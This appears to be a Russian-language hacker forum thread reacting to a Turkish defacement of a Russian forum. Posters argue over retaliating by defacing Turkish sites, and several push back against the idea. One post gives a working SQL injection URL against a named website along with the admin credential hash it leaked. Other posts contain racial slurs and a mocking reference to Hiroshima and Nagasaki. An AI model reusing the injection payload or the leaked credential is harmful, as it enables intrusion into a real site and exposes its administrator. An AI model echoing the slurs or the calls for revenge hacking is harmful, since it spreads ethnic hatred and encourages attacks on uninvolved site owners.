включай сегодня вечером телеканал Домашний - там мультик про дятла. Конечно просмотр составляет весьма поверхностное мнение, но думаю если после этого дятла встретишь - сразу узнаешь.
http://barijessence.com/?page=ModelShow&ProductID=1%20or%201=(select+top+1+UserLoginName%2B':'%2BUserPassword+from+tblUsers+where+id=3)-- ыыыы admin:8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918
>Fuck yourussians!!! турки совсем ахренели! МЫ - РОССИЯ круче этих черномазых идиотов! И за оскорбления на россию мы должны отомстить =/
оноситесь к этому спокойнее и терпимее. Один нездоровый турок выразил свои нездоровые мысли.. и это его проблемы. devil2007, не суди и не судимым будешь.. Тот, кто мыслит также - вы не правы..
Турки совсем акуели. Взломали первый форум на котором я зарегился и написали вроди чёто типо "Russian - lamers". Кароче, имхо, надо отомстить))
имхо если мстить то только тем кто дефейснул, если дефейсить все что на турецком то пострадают только ленивые админы каких-нить далеких от хакерства проектов, а искать их я думаю проблема(
Да ппц одно нездоровое дитё насрало на сайте. Куча других нездоровых детей теперь кидают пальца. Я не прав?
мне пох на деф и на турков, просто интересно почему турки так нас не любят. За что? Ну я не про этого дятла , который дефнул сайт, а в целом. В турции же были случаи, когда русских убивали и вешали на столбы (отдыхающих). И в сети - я видел нимало дефоф, где турки говорят, что мы мудаки. Это же не просто так! Кто им че сделал? и хрен могу понять!
есть идея круче 1) похекаем все сайты в Германии - они вторую мировую начали 2) похекаем все сайты в Франции - из-за Наполеона 3) похекаем все сайты в Японии - чтоб не расслаблялись после хирасими и нигерсраки и так список можно продолжать дальше. Люди, будьте взрослее, чепуху несете же. Короче говоря поддерживаю Кеша и LoneWolf666.